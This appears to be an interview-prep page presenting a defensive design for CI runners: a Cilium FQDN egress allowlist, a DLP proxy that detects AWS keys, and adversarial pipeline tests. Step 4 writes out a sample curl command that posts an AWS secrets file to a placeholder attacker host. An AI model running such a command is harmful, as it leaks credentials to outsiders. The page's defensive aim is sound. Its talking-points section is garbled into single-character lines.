⚡ ~/naveed Interview Prep
⚡ Portfolio Home ✍️ Engineering Blog Deep Dives 🎯 Interview Hub 1,000+ Scenarios ☸️ Kubernetes Mastery Hub 24 Modules 🎮 DevOps Arcade & Quizzes Subnet Blitz ⚡ 🗺️ DevOps Roadmaps PDFs & Guides 🤖 Morpheus Analysis AI Quant ↗ 🛠️ Developer Tools Utilities 🧪 Labs & Experiments 📄 Interactive CV & Certs 🔗 All Links & Socials ⚡ Join The Dispatch (Weekly SRE Newsletter) →
← Back to All CI/CD & GitOps Interview Questions Scenario 174 of 176 in CI/CD & GitOps
Staff Infrastructure Architect CI/CD Continuous Delivery & GitOps Production Scenario

Q: A recent security assessment demonstrated that a malicious npm postinstall script injected into a pull request could easily exfiltrate AWS temporary credentials and source code to an attacker-controlled VPS. Your CI/CD runner cluster runs hundreds of third-party build scripts daily. You must implement a Zero-Trust egress architecture on Kubernetes using Cilium Layer 7 FQDN NetworkPolicies and Envoy forward proxies that strictly blocks all outbound network traffic from CI runners except to explicitly allowlisted package registries and APIs.

Protect CI/CD build environments against malicious dependency exfiltration and command-and-control beacons using Cilium FQDN egress network policies and authenticated forward proxies.

#CI/CD #Security #Zero Trust #Cilium #NetworkPolicy
🎙️ Candidate Opening & Architectural Context
"Protect CI/CD build environments against malicious dependency exfiltration and command-and-control beacons using Cilium FQDN egress network policies and authenticated forward proxies."
Advertisement
⚡ Recommended Practice Lab

Want to master this scenario in a live sandbox? KodeKloud's Enterprise GitOps with ArgoCD & Kubernetes Rollouts covers this exact problem with hands-on terminal drills.

🛠️ Production Runbook & Step-by-Step Resolution

Step 1

Analyze CI Runner Outbound Network Traffic Patterns

Profile egress network traffic of build jobs using Cilium Hubble. Map all legitimate endpoints required during typical builds: GitHub API, npm registry, PyPI, Maven Central, Docker Hub, and AWS STS.

# Inspect real-time DNS queries and egress connections with Hubble CLI
hubble observe --namespace ci-runners --type drop
hubble observe --namespace ci-runners --type trace -f
Pro Tip: Analyze CI Runner Outbound Network Traffic Patterns
Step 2

Deploy Cilium FQDN-Based Layer 7 Egress NetworkPolicy

Apply a CiliumClusterwideNetworkPolicy that denies all egress by default, selectively allowing DNS resolution on port 53 and HTTPS egress strictly to authorized Fully Qualified Domain Names (FQDNs).

apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: secure-runner-egress
  namespace: ci-runners
spec:
  endpointSelector:
    matchLabels:
      app: ci-build-runner
  egress:
    # Allow CoreDNS within the cluster
    - toEndpoints:
        - matchLabels:
            k8s:io.kubernetes.pod.namespace: kube-system
            k8s-app: kube-dns
      toPorts:
        - ports:
            - port: '53'
              protocol: UDP
          rules:
            dns:
              - matchPattern: '*'
    # Allow HTTPS to strictly allowlisted registries
    - toFQDNs:
        - matchName: 'github.com'
        - matchName: 'api.github.com'
        - matchName: 'registry.npmjs.org'
        - matchName: 'pypi.org'
        - matchName: 'files.pythonhosted.org'
        - matchPattern: '*.docker.io'
        - matchPattern: '*.amazonaws.com'
      toPorts:
        - ports:
            - port: '443'
              protocol: TCP
Pro Tip: Deploy Cilium FQDN-Based Layer 7 Egress NetworkPolicy
Advertisement
Step 3

Enforce Transparent MITM Inspection for Credential Leaks

Route outbound runner traffic through an authenticated egress proxy (e.g., Envoy or Squid) configured with TLS inspection and regex data loss prevention (DLP) rules that detect AWS access keys (`AKIA[0-9A-Z]{16}`) and GitHub Personal Access Tokens.

Pro Tip: Enforce Transparent MITM Inspection for Credential Leaks
Step 4

Simulate and Verify Exfiltration Attacks in Pipeline Tests

Execute automated adversarial pipeline test suites attempting outbound `curl -X POST https://evil-c2-server.com --data @$AWS_SECRET_FILE`. Verify that the connection is immediately reset and triggers an automated PagerDuty security incident.

Pro Tip: Simulate and Verify Exfiltration Attacks in Pipeline Tests
💡 The Senior SRE Gold Nugget (Key Architectural Takeaway)
"Unrestricted egress on CI/CD runners allows compromised dependencies to exfiltrate secrets and code. Implementing Cilium FQDN Layer 7 network policies and egress DLP proxies enforces zero-trust boundaries, blocking malicious C2 and exfiltration attempts."
⚡ 60-Second Elevator Pitch Talking Points
  • T
  • o
  • p
  • r
  • e
  • v
  • e
  • n
  • t
  • m
  • a
  • l
  • i
  • c
  • i
  • o
  • u
  • s
  • o
  • p
  • e
  • n
  • -
  • s
  • o
  • u
  • r
  • c
  • e
  • p
  • a
  • c
  • k
  • a
  • g
  • e
  • s
  • f
  • r
  • o
  • m
  • e
  • x
  • f
  • i
  • l
  • t
  • r
  • a
  • t
  • i
  • n
  • g
  • c
  • r
  • e
  • d
  • e
  • n
  • t
  • i
  • a
  • l
  • s
  • f
  • r
  • o
  • m
  • o
  • u
  • r
  • C
  • I
  • r
  • u
  • n
  • n
  • e
  • r
  • s
  • ,
  • w
  • e
  • d
  • e
  • p
  • l
  • o
  • y
  • e
  • d
  • C
  • i
  • l
  • i
  • u
  • m
  • L
  • a
  • y
  • e
  • r
  • 7
  • F
  • Q
  • D
  • N
  • e
  • g
  • r
  • e
  • s
  • s
  • n
  • e
  • t
  • w
  • o
  • r
  • k
  • p
  • o
  • l
  • i
  • c
  • i
  • e
  • s
  • .
  • A
  • l
  • l
  • r
  • u
  • n
  • n
  • e
  • r
  • e
  • g
  • r
  • e
  • s
  • s
  • i
  • s
  • b
  • l
  • o
  • c
  • k
  • e
  • d
  • b
  • y
  • d
  • e
  • f
  • a
  • u
  • l
  • t
  • a
  • n
  • d
  • r
  • e
  • s
  • t
  • r
  • i
  • c
  • t
  • e
  • d
  • e
  • x
  • c
  • l
  • u
  • s
  • i
  • v
  • e
  • l
  • y
  • t
  • o
  • v
  • e
  • r
  • i
  • f
  • i
  • e
  • d
  • r
  • e
  • g
  • i
  • s
  • t
  • r
  • i
  • e
  • s
  • l
  • i
  • k
  • e
  • G
  • i
  • t
  • H
  • u
  • b
  • ,
  • n
  • p
  • m
  • ,
  • a
  • n
  • d
  • P
  • y
  • P
  • I
  • ,
  • n
  • e
  • u
  • t
  • r
  • a
  • l
  • i
  • s
  • i
  • n
  • g
  • s
  • u
  • p
  • p
  • l
  • y
  • c
  • h
  • a
  • i
  • n
  • e
  • x
  • f
  • i
  • l
  • t
  • r
  • a
  • t
  • i
  • o
  • n
  • a
  • t
  • t
  • e
  • m
  • p
  • t
  • s
  • a
  • t
  • t
  • h
  • e
  • k
  • e
  • r
  • n
  • e
  • l
  • l
  • a
  • y
  • e
  • r
  • .
Advertisement
Want more CI/CD & GitOps scenarios?
Explore our complete collection of scenario-based CI/CD & GitOps interview runbooks.
Browse All CI/CD & GitOps Questions →